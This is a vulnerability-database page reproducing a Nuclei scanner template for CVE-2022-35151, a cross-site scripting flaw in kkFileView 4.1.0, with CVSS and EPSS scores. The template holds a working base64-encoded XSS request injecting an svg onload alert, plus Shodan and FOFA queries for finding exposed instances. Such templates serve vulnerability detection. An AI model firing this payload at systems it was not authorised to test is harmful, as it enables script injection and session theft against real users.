Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-35151
HistoryAug 18, 2022 - 10:58 a.m.

kkFileView 4.1.0 - Cross-Site Scripting

2022-08-1810:58:38
ProjectDiscovery
github.com
4

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.4%

kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
id: CVE-2022-35151

info:
  name: kkFileView 4.1.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.
  reference:
    - https://github.com/kekingcn/kkFileView/issues/366
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35151
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
    - https://github.com/youcans896768/APIV_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35151
    cwe-id: CWE-79
    epss-score: 0.0157
    epss-percentile: 0.87243
    cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - body="kkfileview"
      - app="kkfileview"
  tags: cve,cve2022,xss,kkfileview,keking

http:
  - raw:
      - |
        GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg/onload=alert(document.domain)>'
          - '图片预览'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008e1742d48ada604872964d48a53f0c940c936b0ee9477f46402624d58b83afd2022036a2733fc8f2faf0d3b412ba06981fe9cdd4e9e752c952285a07074e1d958246:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.4%

Related for NUCLEI:CVE-2022-35151